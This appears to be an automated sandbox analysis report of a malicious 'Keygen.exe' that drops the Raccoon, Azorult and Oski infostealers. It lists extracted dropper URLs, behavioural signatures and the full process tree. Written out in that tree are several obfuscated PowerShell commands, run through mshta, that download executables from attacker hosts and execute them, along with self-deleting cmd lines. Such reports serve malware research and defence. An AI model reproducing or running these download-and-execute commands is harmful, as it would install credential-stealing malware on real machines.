Overview

overview

10

Static

static

Keygen.exe

windows7_x64

Keygen.exe

windows10_x64

Resubmissions

14-03-2021 10:17

210314-fsh5gvfbqx 10

31-10-2020 16:07

201031-jhx64f88en 10

01-10-2020 20:46

201001-nyhbt4p25j 10

01-10-2020 20:45

201001-c3xkyk1ytn 10

01-10-2020 20:43

201001-j5wlprfb6a 10

23-09-2020 09:23

200923-31plnbj8kx 10

07-09-2020 15:39

200907-ttv28yxx3e 10

07-09-2020 15:39

200907-n38qzysfy6 10

07-09-2020 15:38

200907-9llegynkjx 10

07-09-2020 15:31

200907-3xqj79j9gx 10

Analysis

  • max time kernel
    81s
  • max time network
    82s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    23-09-2020 09:23

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Keygen.exe

  • Size

    849KB

  • MD5

    dbde61502c5c0e17ebc6919f361c32b9

  • SHA1

    189749cf0b66a9f560b68861f98c22cdbcafc566

  • SHA256

    88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b

  • SHA512

    d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb

Score
10/10
ransomwarediscoverybootkitspywaretrojaninfostealerazorultstealerraccoonoski

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT
exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe
exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv
exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe
exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD
exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe
exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:03 2020 Launched at: 2020.09.23 - 11:20:36 GMT Bot_ID: 18823CA4-5761-4226-8787-CF36135F1C68_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: LZUKLIOU - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (911 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

    infostealeroski
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • Blacklisted process makes network request 6 IoCs
  • Executes dropped EXE 19 IoCs
  • Modifies WinLogon to allow AutoLogon 2 TTPs 1 IoCs

    Enables rebooting of the machine without requiring login credentials.

    ransomwarebootkit
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 15 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Accesses cryptocurrency wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 1 IoCs
  • JavaScript code in executable 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Windows directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 260 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 168 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Keygen.exe
    "C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:408
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A58C.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3872
      • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:3928
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A58C.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3500
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blacklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1940
          • C:\Users\Public\toi.exe
            "C:\Users\Public\toi.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4852
            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              "C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:5072
              • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
                "C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:4804
            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              "C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:5108
              • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
                "C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Checks processor information in registry
                PID:3904
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 3904 & erase C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe & RD /S /Q C:\\ProgramData\\301366531928245\\* & exit
                  8⤵
                    PID:3976
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 3904
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2312
              • C:\Users\Public\toi.exe
                "C:\Users\Public\toi.exe"
                6⤵
                • Executes dropped EXE
                PID:4256
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A58C.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3792
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2228
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:3600
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A58C.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3900
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blacklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3968
            • C:\Users\Public\ltv.exe
              "C:\Users\Public\ltv.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4832
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Jwoasxr.vbs"
                6⤵
                  PID:4428
                  • C:\Users\Admin\AppData\Local\Temp\ooo.exe
                    "C:\Users\Admin\AppData\Local\Temp\ooo.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4564
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Gsgxeo.vbs"
                      8⤵
                        PID:184
                        • C:\Users\Admin\AppData\Local\Temp\aaa.exe
                          "C:\Users\Admin\AppData\Local\Temp\aaa.exe"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4244
                          • C:\Users\Admin\AppData\Local\Temp\aaa.exe
                            "C:\Users\Admin\AppData\Local\Temp\aaa.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:3068
                      • C:\Users\Admin\AppData\Local\Temp\ooo.exe
                        "C:\Users\Admin\AppData\Local\Temp\ooo.exe"
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:4992
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 4992 & erase C:\Users\Admin\AppData\Local\Temp\ooo.exe & RD /S /Q C:\\ProgramData\\729482354018777\\* & exit
                          9⤵
                            PID:5088
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 4992
                              10⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4212
                    • C:\Users\Public\ltv.exe
                      "C:\Users\Public\ltv.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:4552
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A58C.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:192
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1352
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                3⤵
                • Delays execution with timeout.exe
                PID:2100
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A58C.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3940
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blacklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3956
                  • C:\Users\Public\ucq.exe
                    "C:\Users\Public\ucq.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:4820
                    • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
                      "C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:5084
                      • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
                        "C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3044
                    • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
                      "C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2588
                      • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
                        "C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Checks processor information in registry
                        PID:3964
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 3964 & erase C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe & RD /S /Q C:\\ProgramData\\940977686466325\\* & exit
                          8⤵
                            PID:1536
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 3964
                              9⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1624
                      • C:\Users\Public\ucq.exe
                        "C:\Users\Public\ucq.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops desktop.ini file(s)
                        PID:4280
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A58C.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2444
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3752
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
              1⤵
              • Drops file in Windows directory
              • Modifies Control Panel
              • Modifies Internet Explorer settings
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2628
            • C:\Windows\system32\browser_broker.exe
              C:\Windows\system32\browser_broker.exe -Embedding
              1⤵
              • Modifies Internet Explorer settings
              PID:5056
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4724
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies Internet Explorer settings
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              PID:3844
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              PID:3908
            • C:\Windows\system32\LogonUI.exe
              "LogonUI.exe" /flags:0x0 /state0:0xa3adb855 /state1:0x41c64e6d
              1⤵
              • Modifies WinLogon to allow AutoLogon
              • Modifies data under HKEY_USERS
              • Suspicious use of SetWindowsHookEx
              PID:5000

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\freebl3.dll
              Download Submit

            • C:\ProgramData\mozglue.dll
              Download Submit

            • C:\ProgramData\mozglue.dll
              Download Submit

            • C:\ProgramData\msvcp140.dll
              Download Submit

            • C:\ProgramData\nss3.dll
              Download Submit

            • C:\ProgramData\nss3.dll
              Download Submit

            • C:\ProgramData\softokn3.dll
              Download Submit

            • C:\ProgramData\softokn3.dll
              Download Submit

            • C:\ProgramData\sqlite3.dll
              Download Submit

            • C:\ProgramData\sqlite3.dll
              Download Submit

            • C:\ProgramData\vcruntime140.dll
              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Download Submit

